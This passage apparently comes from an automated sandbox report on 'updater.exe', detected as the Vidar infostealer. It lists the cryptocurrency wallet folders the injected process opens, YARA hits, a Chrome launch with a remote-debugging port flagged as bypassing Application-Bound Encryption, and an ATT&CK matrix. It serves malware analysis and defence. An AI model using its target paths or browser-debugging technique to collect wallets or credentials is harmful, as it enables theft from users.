Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Source: Yara match	File source: 00000003.00000002.3090094818.0000000002E8B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: BitLockerToGo.exe PID: 6584, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 00000000.00000002.2454538216.000000000BF16000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2454538216.000000000BE20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2454538216.000000000BDE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3089686713.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2454538216.000000000BE00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2454538216.000000000BE40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: updater.exe PID: 5624, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BitLockerToGo.exe PID: 6584, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 Registry Run Keys / Startup Folder	311 Process Injection	1 Masquerading	2 OS Credential Dumping	1 Query Registry	Remote Services	4 Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Registry Run Keys / Startup Folder	1 Virtualization/Sandbox Evasion	1 Credentials in Registry	1 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Remote Access Software	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	311 Process Injection	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Extra Window Memory Injection	1 DLL Side-Loading	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Extra Window Memory Injection	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	23 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report updater.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
updater.exe